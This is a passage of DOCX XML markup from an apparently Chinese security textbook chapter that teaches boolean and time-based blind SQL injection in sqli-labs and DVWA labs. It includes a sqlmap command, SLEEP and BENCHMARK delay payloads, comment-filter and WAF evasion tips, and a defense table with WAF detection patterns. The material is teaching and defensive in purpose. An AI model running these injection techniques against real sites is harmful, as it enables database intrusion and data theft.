      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举数据库；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--level</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调高可增加探测深度。当确认存在时间盲注点时，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique=T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bash  sqlmap -u "&lt;TARGET_URL&gt;/Less-9/?id=1" --technique=T --dbs --time-sec 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设定延迟判定阈值（秒）。所有目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和选项的实际有效性因靶机配置和版本而异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象/输出要点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">布尔手工测试：通过观察页面中的特征字符串（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“You are in”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Welcome”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）出现与否判断真值。也可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">比较器对比两次请求的响应长度。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出中会逐步显示探测到的注入类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“boolean-based blind”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“time-based blind”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），并列出数据库名。具体库名以学员实际实验为准。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注：需留意网络延迟变异。正常响应时间通常为毫秒级，触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP(5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则延迟约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒。可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令或在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的响应时间列中观察。若网络波动大，可增加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数值（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒）降低误判。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">时延抖动导致误判</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：时间盲注在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模拟或虚拟机高负载下可能出现非注入引起的随机延迟。建议实验前用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认网络延迟平稳，并在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中适当提高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--time-sec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阈值。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注释符被过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--%20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等变体。若仍被拦截，可能需要闭合后面的引号，或利用空字节绕过，但此类绕过属于高级范畴，本书仅示意。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阻断高频请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本地实验通常无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF，但若在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台遇到，可降低</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">线程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并增大</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--delay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">函数不可用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：极少数靶机禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可改用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BENCHMARK(10000000, md5(1))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模拟延迟，或利用笛卡尔积连接大表造成计算延迟，原理相同。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无法区分真假页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查表单提交方式（GET/POST）；若为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">POST，需用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改包。DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">级别使用下拉菜单提交，需抓包并修改参数。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:id="172" w:name="防御对照框-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="2970"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">防御层面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">具体措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">效果与局限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">代码层修复（根治）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">使用参数化查询（预处理语句），所有数据通过绑定变量传入，从语法上杜绝注入可能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">适用于所有类型的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入，包括盲注。无论是否回显、有无延时信道，恶意请求无法改变</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">语法树结构。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">数据库配置加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（在不影响业务前提下）禁用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">BENCHMARK</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等延时函数；限制查询执行时间（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MySQL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">max_execution_time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可削弱时间盲注信道，但攻击者可能改用其他高耗时代替（如笛卡尔积自连接大表）仍能制造延迟。严格超时也可能影响正常复杂报表查询。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">应用层通用拦截</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">统一错误页面，所有异常均返回相同</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HTTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">状态码与无内容差异的响应，消除布尔判定依据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">能阻断仅依靠内容差异的布尔盲注，但无法阻挡时间盲注，因为延迟是时间维度的差异。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检测单</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或会话在短时间内对同一参数发送大量仅谓词变化（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">AND 1=1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">vs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">AND 1=2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等）的请求，或包含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SUBSTRING</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ASCII</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等函数的组合。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">可捕获许多盲注攻击，但攻击者可通过编码、注释、等价函数替换及分布式慢速扫描规避。非根治，属于纵深防御一环。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">数据库审计与蓝队检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">开启数据库查询日志，监控大量重复的相似查询模板，尤其是包含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
